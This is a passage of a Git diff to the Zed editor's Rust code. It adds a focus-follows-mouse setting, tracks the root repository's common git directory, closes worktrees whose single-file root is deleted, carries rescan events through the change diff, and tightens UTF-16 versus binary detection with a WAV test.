+ workspace.update_in(cx, |workspace, window, cx| { + workspace.right_dock().update(cx, |dock, cx| { + dock.set_open(true, window, cx); + dock.activate_panel(1, window, cx); + }); + }); + + // Now trigger another SettingsStore change + workspace.update_in(cx, |_workspace, _window, cx| { + cx.update_global::(|_, _| {}); + }); + + workspace.update_in(cx, |workspace, _, cx| { + assert!( + workspace.right_dock().read(cx).is_open(), + "Right dock should still be open after a settings change" + ); + assert_eq!( + workspace.right_dock().read(cx).panels_len(), + 2, + "Both panels should still be in the right dock" + ); + }); + } } diff --git a/crates/workspace/src/workspace_settings.rs b/crates/workspace/src/workspace_settings.rs index 5575af3d7cf07fd7afd22ddbb78a620bab775714..ee0e80336d744cadaecdf0201525deddb8d5eec9 100644 --- a/crates/workspace/src/workspace_settings.rs +++ b/crates/workspace/src/workspace_settings.rs @@ -1,4 +1,4 @@ -use std::num::NonZeroUsize; +use std::{num::NonZeroUsize, time::Duration}; use crate::DockPosition; use collections::HashMap; @@ -35,6 +35,13 @@ pub struct WorkspaceSettings { pub use_system_window_tabs: bool, pub zoomed_padding: bool, pub window_decorations: settings::WindowDecorations, + pub focus_follows_mouse: FocusFollowsMouse, +} + +#[derive(Copy, Clone, Deserialize)] +pub struct FocusFollowsMouse { + pub enabled: bool, + pub debounce: Duration, } #[derive(Copy, Clone, PartialEq, Debug, Default)] @@ -113,6 +120,20 @@ impl Settings for WorkspaceSettings { use_system_window_tabs: workspace.use_system_window_tabs.unwrap(), zoomed_padding: workspace.zoomed_padding.unwrap(), window_decorations: workspace.window_decorations.unwrap(), + focus_follows_mouse: FocusFollowsMouse { + enabled: workspace + .focus_follows_mouse + .unwrap() + .enabled + .unwrap_or(false), + debounce: Duration::from_millis( + workspace + .focus_follows_mouse + .unwrap() + .debounce_ms + .unwrap_or(250), + ), + }, } } } @@ -132,6 +153,7 @@ impl Settings for 
TabBarSettings { #[derive(Deserialize, RegisterSetting)] pub struct StatusBarSettings { pub show: bool, + pub show_active_file: bool, pub active_language_button: bool, pub cursor_position_button: bool, pub line_endings_button: bool, @@ -143,6 +165,7 @@ impl Settings for StatusBarSettings { let status_bar = content.status_bar.clone().unwrap(); StatusBarSettings { show: status_bar.show.unwrap(), + show_active_file: status_bar.show_active_file.unwrap(), active_language_button: status_bar.active_language_button.unwrap(), cursor_position_button: status_bar.cursor_position_button.unwrap(), line_endings_button: status_bar.line_endings_button.unwrap(), diff --git a/crates/worktree/Cargo.toml b/crates/worktree/Cargo.toml index 788333b5e801f2a0bb22558945d2f142b50ef0a5..6d8faad3dc495a02e054f3fa652f5815f301cf3f 100644 --- a/crates/worktree/Cargo.toml +++ b/crates/worktree/Cargo.toml @@ -21,7 +21,7 @@ workspace = true [features] test-support = [ "gpui/test-support", - "http_client/test-support", + "language/test-support", "pretty_assertions", "settings/test-support", @@ -63,9 +63,7 @@ ztracing.workspace = true [dev-dependencies] clock = { workspace = true, features = ["test-support"] } collections = { workspace = true, features = ["test-support"] } -git2.workspace = true gpui = { workspace = true, features = ["test-support"] } -http_client.workspace = true paths = { workspace = true, features = ["test-support"] } rand.workspace = true rpc = { workspace = true, features = ["test-support"] } diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index 69b0be24e7ffb09d3fe759ec0bd3d54b54db21d3..864858073db70c984e61dbf43bf98be44f6c1c58 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -7,7 +7,9 @@ use chardetng::EncodingDetector; use clock::ReplicaId; use collections::{HashMap, HashSet, VecDeque}; use encoding_rs::Encoding; -use fs::{Fs, MTime, PathEvent, RemoveOptions, Watcher, copy_recursive, read_dir_items}; +use fs::{ + 
Fs, MTime, PathEvent, PathEventKind, RemoveOptions, Watcher, copy_recursive, read_dir_items, +}; use futures::{ FutureExt as _, Stream, StreamExt, channel::{ @@ -128,6 +130,7 @@ pub struct LocalWorktree { scan_requests_tx: channel::Sender, path_prefixes_to_scan_tx: channel::Sender, is_scanning: (watch::Sender, watch::Receiver), + snapshot_subscriptions: VecDeque<(usize, oneshot::Sender<()>)>, _background_scanner_tasks: Vec>, update_observer: Option, fs: Arc, @@ -173,6 +176,7 @@ pub struct Snapshot { root_char_bag: CharBag, entries_by_path: SumTree, entries_by_id: SumTree, + root_repo_common_dir: Option>, always_included_entries: Vec>, /// A number that increases every time the worktree begins scanning @@ -267,6 +271,12 @@ struct BackgroundScannerState { scanning_enabled: bool, } +#[derive(Clone, Debug, Eq, PartialEq)] +struct EventRoot { + path: Arc, + was_rescanned: bool, +} + #[derive(Debug, Clone)] struct LocalRepositoryEntry { work_directory_id: ProjectEntryId, @@ -280,9 +290,11 @@ struct LocalRepositoryEntry { dot_git_abs_path: Arc, /// Absolute path to the "commondir" for this repository. /// - /// This is always a directory. For a normal repository, this is the same as dot_git_abs_path, - /// but in the case of a submodule or a worktree it is the path to the "parent" .git directory - /// from which the submodule/worktree was derived. + /// This is always a directory. For a normal repository, this is the same as + /// `dot_git_abs_path`. For a linked worktree, this is the main repo's `.git` + /// directory (resolved from the worktree's `commondir` file). For a submodule, + /// this equals `repository_dir_abs_path` (submodules don't have a `commondir` + /// file). common_dir_abs_path: Arc, /// Absolute path to the directory holding the repository's state. 
/// @@ -344,6 +356,7 @@ enum ScanState { RootUpdated { new_path: Arc, }, + RootDeleted, } struct UpdateObservationState { @@ -356,7 +369,10 @@ struct UpdateObservationState { pub enum Event { UpdatedEntries(UpdatedEntriesSet), UpdatedGitRepositories(UpdatedGitRepositoriesSet), + UpdatedRootRepoCommonDir, DeletedEntry(ProjectEntryId), + /// The worktree root itself has been deleted (for single-file worktrees) + Deleted, } impl EventEmitter for Worktree {} @@ -393,6 +409,10 @@ impl Worktree { None }; + let root_repo_common_dir = discover_root_repo_common_dir(&abs_path, fs.as_ref()) + .await + .map(SanitizedPath::from_arc); + Ok(cx.new(move |cx: &mut Context| { let mut snapshot = LocalSnapshot { ignores_by_parent_abs_path: Default::default(), @@ -412,6 +432,7 @@ impl Worktree { ), root_file_handle, }; + snapshot.root_repo_common_dir = root_repo_common_dir; let worktree_id = snapshot.id(); let settings_location = Some(SettingsLocation { @@ -464,6 +485,7 @@ impl Worktree { next_entry_id, snapshot, is_scanning: watch::channel_with(true), + snapshot_subscriptions: Default::default(), update_observer: None, scan_requests_tx, path_prefixes_to_scan_tx, @@ -549,6 +571,7 @@ impl Worktree { this.update(cx, |this, cx| { let mut entries_changed = false; let this = this.as_remote_mut().unwrap(); + let old_root_repo_common_dir = this.snapshot.root_repo_common_dir.clone(); { let mut lock = this.background_snapshot.lock(); this.snapshot = lock.0.clone(); @@ -564,6 +587,9 @@ impl Worktree { if entries_changed { cx.emit(Event::UpdatedEntries(Arc::default())); } + if this.snapshot.root_repo_common_dir != old_root_repo_common_dir { + cx.emit(Event::UpdatedRootRepoCommonDir); + } cx.notify(); while let Some((scan_id, _)) = this.snapshot_subscriptions.front() { if this.observed_snapshot(*scan_id) { @@ -708,6 +734,16 @@ impl Worktree { } } + pub fn wait_for_snapshot( + &mut self, + scan_id: usize, + ) -> impl Future> + use<> { + match self { + Worktree::Local(this) => 
this.wait_for_snapshot(scan_id).boxed(), + Worktree::Remote(this) => this.wait_for_snapshot(scan_id).boxed(), + } + } + #[cfg(feature = "test-support")] pub fn has_update_observer(&self) -> bool { match self { @@ -1084,6 +1120,7 @@ impl LocalWorktree { }; let fs_case_sensitive = fs.is_case_sensitive().await; + let is_single_file = snapshot.snapshot.root_dir().is_none(); let mut scanner = BackgroundScanner { fs, fs_case_sensitive, @@ -1106,6 +1143,7 @@ impl LocalWorktree { share_private_files, settings, watcher, + is_single_file, }; scanner @@ -1134,6 +1172,13 @@ impl LocalWorktree { ScanState::RootUpdated { new_path } => { this.update_abs_path_and_refresh(new_path, cx); } + ScanState::RootDeleted => { + log::info!( + "worktree root {} no longer exists, closing worktree", + this.abs_path().display() + ); + cx.emit(Event::Deleted); + } } }); } @@ -1149,6 +1194,13 @@ impl LocalWorktree { cx: &mut Context, ) { let repo_changes = self.changed_repos(&self.snapshot, &mut new_snapshot); + + new_snapshot.root_repo_common_dir = new_snapshot + .local_repo_for_work_directory_path(RelPath::empty()) + .map(|repo| SanitizedPath::from_arc(repo.common_dir_abs_path.clone())); + + let root_repo_common_dir_changed = + self.snapshot.root_repo_common_dir != new_snapshot.root_repo_common_dir; self.snapshot = new_snapshot; if let Some(share) = self.update_observer.as_mut() { @@ -1164,6 +1216,18 @@ impl LocalWorktree { if !repo_changes.is_empty() { cx.emit(Event::UpdatedGitRepositories(repo_changes)); } + if root_repo_common_dir_changed { + cx.emit(Event::UpdatedRootRepoCommonDir); + } + + while let Some((scan_id, _)) = self.snapshot_subscriptions.front() { + if self.snapshot.completed_scan_id >= *scan_id { + let (_, tx) = self.snapshot_subscriptions.pop_front().unwrap(); + tx.send(()).ok(); + } else { + break; + } + } } fn changed_repos( @@ -1280,6 +1344,28 @@ impl LocalWorktree { } } + pub fn wait_for_snapshot( + &mut self, + scan_id: usize, + ) -> impl Future> + use<> { + let (tx, rx) = 
oneshot::channel(); + if self.snapshot.completed_scan_id >= scan_id { + tx.send(()).ok(); + } else { + match self + .snapshot_subscriptions + .binary_search_by_key(&scan_id, |probe| probe.0) + { + Ok(ix) | Err(ix) => self.snapshot_subscriptions.insert(ix, (scan_id, tx)), + } + } + + async move { + rx.await?; + Ok(()) + } + } + pub fn snapshot(&self) -> LocalSnapshot { self.snapshot.clone() } @@ -1322,6 +1408,7 @@ impl LocalWorktree { path, disk_state: DiskState::Present { mtime: metadata.mtime, + size: metadata.len, }, is_local: true, is_private, @@ -1378,6 +1465,7 @@ impl LocalWorktree { path, disk_state: DiskState::Present { mtime: metadata.mtime, + size: metadata.len, }, is_local: true, is_private, @@ -1575,6 +1663,7 @@ impl LocalWorktree { path, disk_state: DiskState::Present { mtime: metadata.mtime, + size: metadata.len, }, entry_id: None, is_local: true, @@ -2148,6 +2237,7 @@ impl Snapshot { always_included_entries: Default::default(), entries_by_path: Default::default(), entries_by_id: Default::default(), + root_repo_common_dir: None, scan_id: 1, completed_scan_id: 0, } @@ -2173,6 +2263,12 @@ impl Snapshot { SanitizedPath::cast_arc_ref(&self.abs_path) } + pub fn root_repo_common_dir(&self) -> Option<&Arc> { + self.root_repo_common_dir + .as_ref() + .map(SanitizedPath::cast_arc_ref) + } + fn build_initial_update(&self, project_id: u64, worktree_id: u64) -> proto::UpdateWorktree { let mut updated_entries = self .entries_by_path @@ -2186,6 +2282,9 @@ impl Snapshot { worktree_id, abs_path: self.abs_path().to_string_lossy().into_owned(), root_name: self.root_name().to_proto(), + root_repo_common_dir: self + .root_repo_common_dir() + .map(|p| p.to_string_lossy().into_owned()), updated_entries, removed_entries: Vec::new(), scan_id: self.scan_id as u64, @@ -2331,6 +2430,10 @@ impl Snapshot { self.entries_by_path.edit(entries_by_path_edits, ()); self.entries_by_id.edit(entries_by_id_edits, ()); + self.root_repo_common_dir = update + .root_repo_common_dir + .map(|p| 
SanitizedPath::new_arc(Path::new(&p))); + self.scan_id = update.scan_id as usize; if update.is_last_update { self.completed_scan_id = update.scan_id as usize; @@ -2559,6 +2662,9 @@ impl LocalSnapshot { worktree_id, abs_path: self.abs_path().to_string_lossy().into_owned(), root_name: self.root_name().to_proto(), + root_repo_common_dir: self + .root_repo_common_dir() + .map(|p| p.to_string_lossy().into_owned()), updated_entries, removed_entries, scan_id: self.scan_id as u64, @@ -2708,7 +2814,7 @@ impl LocalSnapshot { for entry in self.entries_by_path.cursor::<()>(()) { if entry.is_file() { assert_eq!(files.next().unwrap().inode, entry.inode); - if (!entry.is_ignored && !entry.is_external) || entry.is_always_included { + if !entry.is_ignored || entry.is_always_included { assert_eq!(visible_files.next().unwrap().inode, entry.inode); } } @@ -2945,7 +3051,7 @@ impl BackgroundScannerState { self.snapshot.check_invariants(false); } - fn remove_path(&mut self, path: &RelPath) { + fn remove_path(&mut self, path: &RelPath, watcher: &dyn Watcher) { log::trace!("background scanner removing path {path:?}"); let mut new_entries; let removed_entries; @@ -2961,7 +3067,12 @@ impl BackgroundScannerState { self.snapshot.entries_by_path = new_entries; let mut removed_ids = Vec::with_capacity(removed_entries.summary().count); + let mut removed_dir_abs_paths = Vec::new(); for entry in removed_entries.cursor::<()>(()) { + if entry.is_dir() { + removed_dir_abs_paths.push(self.snapshot.absolutize(&entry.path)); + } + match self.removed_entries.entry(entry.inode) { hash_map::Entry::Occupied(mut e) => { let prev_removed_entry = e.get_mut(); @@ -2997,6 +3108,10 @@ impl BackgroundScannerState { .git_repositories .retain(|id, _| removed_ids.binary_search(id).is_err()); + for removed_dir_abs_path in removed_dir_abs_paths { + watcher.remove(&removed_dir_abs_path).log_err(); + } + #[cfg(feature = "test-support")] self.snapshot.check_invariants(false); } @@ -3280,7 +3395,10 @@ impl File { worktree, 
path: entry.path.clone(), disk_state: if let Some(mtime) = entry.mtime { - DiskState::Present { mtime } + DiskState::Present { + mtime, + size: entry.size, + } } else { DiskState::New }, @@ -3309,7 +3427,7 @@ impl File { } else if proto.is_deleted { DiskState::Deleted } else if let Some(mtime) = proto.mtime.map(&Into::into) { - DiskState::Present { mtime } + DiskState::Present { mtime, size: 0 } } else { DiskState::New }; @@ -3375,8 +3493,7 @@ pub struct Entry { /// symlink. /// /// We only scan entries outside of the worktree once the symlinked - /// directory is expanded. External entries are treated like gitignored - /// entries in that they are not included in searches. + /// directory is expanded. pub is_external: bool, /// Whether this entry is considered to be a `.env` file. @@ -3581,8 +3698,7 @@ impl sum_tree::Item for Entry { type Summary = EntrySummary; fn summary(&self, _cx: ()) -> Self::Summary { - let non_ignored_count = if (self.is_ignored || self.is_external) && !self.is_always_included - { + let non_ignored_count = if self.is_ignored && !self.is_always_included { 0 } else { 1 @@ -3731,6 +3847,9 @@ struct BackgroundScanner { watcher: Arc, settings: WorktreeSettings, share_private_files: bool, + /// Whether this is a single-file worktree (root is a file, not a directory). + /// Used to determine if we should give up after repeated canonicalization failures. + is_single_file: bool, } #[derive(Copy, Clone, PartialEq)] @@ -3865,7 +3984,7 @@ impl BackgroundScanner { state.snapshot.completed_scan_id = state.snapshot.scan_id; } - self.send_status_update(false, SmallVec::new()).await; + self.send_status_update(false, SmallVec::new(), &[]).await; // Process any any FS events that occurred while performing the initial scan. 
// For these events, update events cannot be as precise, because we didn't @@ -3878,14 +3997,17 @@ impl BackgroundScanner { self.process_events( paths .into_iter() - .filter(|e| e.kind.is_some()) - .map(Into::into) + .filter(|event| event.kind.is_some()) .collect(), ) .await; } if let Some(abs_path) = containing_git_repository { - self.process_events(vec![abs_path]).await; + self.process_events(vec![PathEvent { + path: abs_path, + kind: Some(fs::PathEventKind::Changed), + }]) + .await; } // Continue processing events until the worktree is dropped. @@ -3916,10 +4038,14 @@ impl BackgroundScanner { }; if let Some(abs_path) = self.fs.canonicalize(&abs_path).await.log_err() { - self.process_events(vec![abs_path]).await; + self.process_events(vec![PathEvent { + path: abs_path, + kind: Some(fs::PathEventKind::Changed), + }]) + .await; } } - self.send_status_update(false, request.done).await; + self.send_status_update(false, request.done, &[]).await; } paths = fs_events_rx.next().fuse() => { @@ -3927,7 +4053,7 @@ impl BackgroundScanner { while let Poll::Ready(Some(more_paths)) = futures::poll!(fs_events_rx.next()) { paths.extend(more_paths); } - self.process_events(paths.into_iter().filter(|e| e.kind.is_some()).map(Into::into).collect()).await; + self.process_events(paths.into_iter().filter(|event| event.kind.is_some()).collect()).await; } _ = global_gitignore_events.next().fuse() => { @@ -3984,11 +4110,10 @@ impl BackgroundScanner { ) .await; - self.send_status_update(scanning, request.done).await + self.send_status_update(scanning, request.done, &[]).await } - async fn process_events(&self, mut abs_paths: Vec) { - log::trace!("process events: {abs_paths:?}"); + async fn process_events(&self, mut events: Vec) { let root_path = self.state.lock().await.snapshot.abs_path.clone(); let root_canonical_path = self.fs.canonicalize(root_path.as_path()).await; let root_canonical_path = match &root_canonical_path { @@ -4022,6 +4147,18 @@ impl BackgroundScanner { .ok(); } else { 
log::error!("root path could not be canonicalized: {err:#}"); + + // For single-file worktrees, if we can't canonicalize and the file handle + // fallback also failed, the file is gone - close the worktree + if self.is_single_file { + log::info!( + "single-file worktree root {:?} no longer exists, marking as deleted", + root_path.as_path() + ); + self.status_updates_tx + .unbounded_send(ScanState::RootDeleted) + .ok(); + } } return; } @@ -4032,11 +4169,25 @@ impl BackgroundScanner { let skipped_files_in_dot_git = [COMMIT_MESSAGE, INDEX_LOCK]; let skipped_dirs_in_dot_git = [FSMONITOR_DAEMON, LFS_DIR]; - let mut relative_paths = Vec::with_capacity(abs_paths.len()); + let mut relative_paths = Vec::with_capacity(events.len()); let mut dot_git_abs_paths = Vec::new(); let mut work_dirs_needing_exclude_update = Vec::new(); - abs_paths.sort_unstable(); - abs_paths.dedup_by(|a, b| a.starts_with(b)); + events.sort_unstable_by(|left, right| left.path.cmp(&right.path)); + events.dedup_by(|left, right| { + if left.path == right.path { + if matches!(left.kind, Some(fs::PathEventKind::Rescan)) { + right.kind = left.kind; + } + true + } else if left.path.starts_with(&right.path) { + if matches!(left.kind, Some(fs::PathEventKind::Rescan)) { + right.kind = left.kind; + } + true + } else { + false + } + }); { let snapshot = &self.state.lock().await.snapshot; @@ -4052,8 +4203,8 @@ impl BackgroundScanner { } } - for (ix, abs_path) in abs_paths.iter().enumerate() { - let abs_path = &SanitizedPath::new(&abs_path); + for (ix, event) in events.iter().enumerate() { + let abs_path = SanitizedPath::new(&event.path); let mut is_git_related = false; let mut dot_git_paths = None; @@ -4070,13 +4221,33 @@ impl BackgroundScanner { } if let Some((dot_git_abs_path, path_in_git_dir)) = dot_git_paths { - if skipped_files_in_dot_git + // We ignore `""` as well, as that is going to be the + // `.git` folder itself. 
WE do not care about it, if + // there are changes within we will see them, we need + // this ignore to prevent us from accidentally observing + // the ignored created file due to the events not being + // empty after filtering. + + let is_dot_git_changed = { + path_in_git_dir == Path::new("") + && event.kind == Some(PathEventKind::Changed) + && abs_path + .strip_prefix(root_canonical_path) + .ok() + .and_then(|it| RelPath::new(it, PathStyle::local()).ok()) + .is_some_and(|it| { + snapshot + .entry_for_path(&it) + .is_some_and(|entry| entry.kind == EntryKind::Dir) + }) + }; + let condition = skipped_files_in_dot_git.iter().any(|skipped| { + OsStr::new(skipped) == path_in_git_dir.as_path().as_os_str() + }) || skipped_dirs_in_dot_git .iter() - .any(|skipped| OsStr::new(skipped) == path_in_git_dir.as_path().as_os_str()) - || skipped_dirs_in_dot_git.iter().any(|skipped_git_subdir| { - path_in_git_dir.starts_with(skipped_git_subdir) - }) - { + .any(|skipped_git_subdir| path_in_git_dir.starts_with(skipped_git_subdir)) + || is_dot_git_changed; + if condition { log::debug!( "ignoring event {abs_path:?} as it's in the .git directory among skipped files or directories" ); @@ -4153,11 +4324,14 @@ impl BackgroundScanner { continue; } - relative_paths.push(relative_path.into_arc()); + relative_paths.push(EventRoot { + path: relative_path.into_arc(), + was_rescanned: matches!(event.kind, Some(fs::PathEventKind::Rescan)), + }); } for range_to_drop in ranges_to_drop.into_iter().rev() { - abs_paths.drain(range_to_drop); + events.drain(range_to_drop); } } @@ -4181,12 +4355,24 @@ impl BackgroundScanner { self.state.lock().await.snapshot.scan_id += 1; let (scan_job_tx, scan_job_rx) = channel::unbounded(); - log::debug!("received fs events {:?}", relative_paths); + log::debug!( + "received fs events {:?}", + relative_paths + .iter() + .map(|event_root| &event_root.path) + .collect::>() + ); self.reload_entries_for_paths( &root_path, &root_canonical_path, - &relative_paths, - abs_paths, 
+ &relative_paths + .iter() + .map(|event_root| event_root.path.clone()) + .collect::>(), + events + .into_iter() + .map(|event| event.path) + .collect::>(), Some(scan_job_tx.clone()), ) .await; @@ -4214,7 +4400,8 @@ impl BackgroundScanner { state.scanned_dirs.remove(&entry.id); } } - self.send_status_update(false, SmallVec::new()).await; + self.send_status_update(false, SmallVec::new(), &relative_paths) + .await; } async fn update_global_gitignore(&self, abs_path: &Path) { @@ -4240,7 +4427,7 @@ impl BackgroundScanner { ) .await; self.scan_dirs(false, scan_job_rx).await; - self.send_status_update(false, SmallVec::new()).await; + self.send_status_update(false, SmallVec::new(), &[]).await; } async fn forcibly_load_paths(&self, paths: &[Arc]) -> bool { @@ -4321,7 +4508,8 @@ impl BackgroundScanner { ) { Ok(_) => { last_progress_update_count += 1; - self.send_status_update(true, SmallVec::new()).await; + self.send_status_update(true, SmallVec::new(), &[]) + .await; } Err(count) => { last_progress_update_count = count; @@ -4350,19 +4538,22 @@ impl BackgroundScanner { &self, scanning: bool, barrier: SmallVec<[barrier::Sender; 1]>, + event_roots: &[EventRoot], ) -> bool { let mut state = self.state.lock().await; - if state.changed_paths.is_empty() && scanning { + if state.changed_paths.is_empty() && event_roots.is_empty() && scanning { return true; } + let merged_event_roots = merge_event_roots(&state.changed_paths, event_roots); + let new_snapshot = state.snapshot.clone(); let old_snapshot = mem::replace(&mut state.prev_snapshot, new_snapshot.snapshot.clone()); let changes = build_diff( self.phase, &old_snapshot, &new_snapshot, - &state.changed_paths, + &merged_event_roots, ); state.changed_paths.clear(); @@ -4461,7 +4652,10 @@ impl BackgroundScanner { if self.settings.is_path_excluded(&child_path) { log::debug!("skipping excluded child entry {child_path:?}"); - self.state.lock().await.remove_path(&child_path); + self.state + .lock() + .await + .remove_path(&child_path, 
self.watcher.as_ref()); continue; } @@ -4651,7 +4845,7 @@ impl BackgroundScanner { // detected regardless of the order of the paths. for (path, metadata) in relative_paths.iter().zip(metadata.iter()) { if matches!(metadata, Ok(None)) || doing_recursive_update { - state.remove_path(path); + state.remove_path(path, self.watcher.as_ref()); } } @@ -5213,11 +5407,40 @@ async fn discover_ancestor_git_repo( (ignores, exclude, None) } +fn merge_event_roots(changed_paths: &[Arc], event_roots: &[EventRoot]) -> Vec { + let mut merged_event_roots = Vec::with_capacity(changed_paths.len() + event_roots.len()); + let mut changed_paths = changed_paths.iter().peekable(); + let mut event_roots = event_roots.iter().peekable(); + while let (Some(path), Some(event_root)) = (changed_paths.peek(), event_roots.peek()) { + match path.cmp(&&event_root.path) { + Ordering::Less => { + merged_event_roots.push(EventRoot { + path: (*changed_paths.next().expect("peeked changed path")).clone(), + was_rescanned: false, + }); + } + Ordering::Equal => { + merged_event_roots.push((*event_roots.next().expect("peeked event root")).clone()); + changed_paths.next(); + } + Ordering::Greater => { + merged_event_roots.push((*event_roots.next().expect("peeked event root")).clone()); + } + } + } + merged_event_roots.extend(changed_paths.map(|path| EventRoot { + path: path.clone(), + was_rescanned: false, + })); + merged_event_roots.extend(event_roots.cloned()); + merged_event_roots +} + fn build_diff( phase: BackgroundScannerPhase, old_snapshot: &Snapshot, new_snapshot: &Snapshot, - event_paths: &[Arc], + event_roots: &[EventRoot], ) -> UpdatedEntriesSet { use BackgroundScannerPhase::*; use PathChange::{Added, AddedOrUpdated, Loaded, Removed, Updated}; @@ -5225,13 +5448,14 @@ fn build_diff( // Identify which paths have changed. Use the known set of changed // parent paths to optimize the search. 
let mut changes = Vec::new(); + let mut old_paths = old_snapshot.entries_by_path.cursor::(()); let mut new_paths = new_snapshot.entries_by_path.cursor::(()); let mut last_newly_loaded_dir_path = None; old_paths.next(); new_paths.next(); - for path in event_paths { - let path = PathKey(path.clone()); + for event_root in event_roots { + let path = PathKey(event_root.path.clone()); if old_paths.item().is_some_and(|e| e.path < path.0) { old_paths.seek_forward(&path, Bias::Left); } @@ -5277,6 +5501,8 @@ fn build_diff( } else { changes.push((new_entry.path.clone(), new_entry.id, Updated)); } + } else if event_root.was_rescanned { + changes.push((new_entry.path.clone(), new_entry.id, Updated)); } old_paths.next(); new_paths.next(); @@ -5883,6 +6109,16 @@ fn parse_gitfile(content: &str) -> anyhow::Result<&Path> { Ok(Path::new(path.trim())) } +async fn discover_root_repo_common_dir(root_abs_path: &Path, fs: &dyn Fs) -> Option> { + let root_dot_git = root_abs_path.join(DOT_GIT); + if !fs.metadata(&root_dot_git).await.is_ok_and(|m| m.is_some()) { + return None; + } + let dot_git_path: Arc = root_dot_git.into(); + let (_, common_dir) = discover_git_paths(&dot_git_path, fs).await; + Some(common_dir) +} + async fn discover_git_paths(dot_git_abs_path: &Arc, fs: &dyn Fs) -> (Arc, Arc) { let mut repository_dir_abs_path = dot_git_abs_path.clone(); let mut common_dir_abs_path = dot_git_abs_path.clone(); @@ -6043,7 +6279,7 @@ fn decode_byte_full( } } -#[derive(PartialEq)] +#[derive(Debug, PartialEq)] enum ByteContent { Utf16Le, Utf16Be, @@ -6099,13 +6335,24 @@ fn analyze_byte_content(bytes: &[u8]) -> ByteContent { return ByteContent::Unknown; } - if total_null_count >= limit / 16 { - if even_null_count > odd_null_count * 4 { + let has_significant_nulls = total_null_count >= limit / 16; + let nulls_skew_to_even = even_null_count > odd_null_count * 4; + let nulls_skew_to_odd = odd_null_count > even_null_count * 4; + + if has_significant_nulls { + let sample = &bytes[..limit]; + + // 
UTF-16BE ASCII: [0x00, char] — nulls at even positions (high byte first) + // UTF-16LE ASCII: [char, 0x00] — nulls at odd positions (low byte first) + + if nulls_skew_to_even && is_plausible_utf16_text(sample, false) { return ByteContent::Utf16Be; } - if odd_null_count > even_null_count * 4 { + + if nulls_skew_to_odd && is_plausible_utf16_text(sample, true) { return ByteContent::Utf16Le; } + return ByteContent::Binary; } @@ -6127,4 +6374,208 @@ fn is_known_binary_header(bytes: &[u8]) -> bool { || bytes.starts_with(b"GIF89a") // GIF89a || bytes.starts_with(b"IWAD") // Doom IWAD archive || bytes.starts_with(b"PWAD") // Doom PWAD archive + || bytes.starts_with(b"RIFF") // WAV, AVI, WebP + || bytes.starts_with(b"OggS") // OGG (Vorbis, Opus, FLAC) + || bytes.starts_with(b"fLaC") // FLAC + || bytes.starts_with(b"ID3") // MP3 with ID3v2 tag + || bytes.starts_with(b"\xFF\xFB") // MP3 frame sync (MPEG1 Layer3) + || bytes.starts_with(b"\xFF\xFA") // MP3 frame sync (MPEG1 Layer3) + || bytes.starts_with(b"\xFF\xF3") // MP3 frame sync (MPEG2 Layer3) + || bytes.starts_with(b"\xFF\xF2") // MP3 frame sync (MPEG2 Layer3) +} + +// Null byte skew alone is not enough to identify UTF-16 -- binary formats with +// small 16-bit values (like PCM audio) produce the same pattern. Decode the +// bytes as UTF-16 and reject if too many code units land in control character +// ranges or form unpaired surrogates, which real text almost never contains. 
+fn is_plausible_utf16_text(bytes: &[u8], little_endian: bool) -> bool { + let mut suspicious_count = 0usize; + let mut total = 0usize; + + let mut i = 0; + while let Some(code_unit) = read_u16(bytes, i, little_endian) { + total += 1; + + match code_unit { + 0x0009 | 0x000A | 0x000C | 0x000D => {} + // C0/C1 control characters and non-characters + 0x0000..=0x001F | 0x007F..=0x009F | 0xFFFE | 0xFFFF => suspicious_count += 1, + 0xD800..=0xDBFF => { + let next_offset = i + 2; + let has_low_surrogate = read_u16(bytes, next_offset, little_endian) + .is_some_and(|next| (0xDC00..=0xDFFF).contains(&next)); + if has_low_surrogate { + total += 1; + i += 2; + } else { + suspicious_count += 1; + } + } + // Lone low surrogate without a preceding high surrogate + 0xDC00..=0xDFFF => suspicious_count += 1, + _ => {} + } + + i += 2; + } + + if total == 0 { + return false; + } + + // Real UTF-16 text has near-zero control characters; binary data with + // small 16-bit values typically exceeds 5%. 2% provides a safe margin. 
+ suspicious_count * 100 < total * 2 +} + +fn read_u16(bytes: &[u8], offset: usize, little_endian: bool) -> Option { + let pair = [*bytes.get(offset)?, *bytes.get(offset + 1)?]; + if little_endian { + return Some(u16::from_le_bytes(pair)); + } + Some(u16::from_be_bytes(pair)) +} + +#[cfg(test)] +mod tests { + use super::*; + + /// reproduction of issue #50785 + fn build_pcm16_wav_bytes() -> Vec { + let header: Vec = vec![ + /* RIFF header */ + 0x52, 0x49, 0x46, 0x46, // "RIFF" + 0xc6, 0xcf, 0x00, 0x00, // file size: 8 + 0x57, 0x41, 0x56, 0x45, // "WAVE" + /* fmt chunk */ + 0x66, 0x6d, 0x74, 0x20, // "fmt " + 0x10, 0x00, 0x00, 0x00, // chunk size: 16 + 0x01, 0x00, // format: PCM (1) + 0x01, 0x00, // channels: 1 (mono) + 0x80, 0x3e, 0x00, 0x00, // sample rate: 16000 + 0x00, 0x7d, 0x00, 0x00, // byte rate: 32000 + 0x02, 0x00, // block align: 2 + 0x10, 0x00, // bits per sample: 16 + /* LIST chunk */ + 0x4c, 0x49, 0x53, 0x54, // "LIST" + 0x1a, 0x00, 0x00, 0x00, // chunk size: 26 + 0x49, 0x4e, 0x46, 0x4f, // "INFO" + 0x49, 0x53, 0x46, 0x54, // "ISFT" + 0x0d, 0x00, 0x00, 0x00, // sub-chunk size: 13 + 0x4c, 0x61, 0x76, 0x66, 0x36, 0x32, 0x2e, 0x33, // "Lavf62.3" + 0x2e, 0x31, 0x30, 0x30, 0x00, // ".100\0" + /* padding byte for word alignment */ + 0x00, // data chunk header + 0x64, 0x61, 0x74, 0x61, // "data" + 0x80, 0xcf, 0x00, 0x00, // chunk size + ]; + + let mut bytes = header; + + // fill remaining space up to `FILE_ANALYSIS_BYTES` with synthetic PCM + let audio_bytes_needed = FILE_ANALYSIS_BYTES - bytes.len(); + for i in 0..(audio_bytes_needed / 2) { + let sample = (i & 0xFF) as u8; + bytes.push(sample); // low byte: varies + bytes.push(0x00); // high byte: zero for small values + } + + bytes + } + + #[test] + fn test_pcm16_wav_detected_as_binary() { + let wav_bytes = build_pcm16_wav_bytes(); + assert_eq!(wav_bytes.len(), FILE_ANALYSIS_BYTES); + + let result = analyze_byte_content(&wav_bytes); + assert_eq!( + result, + ByteContent::Binary, + "PCM 16-bit WAV should be 
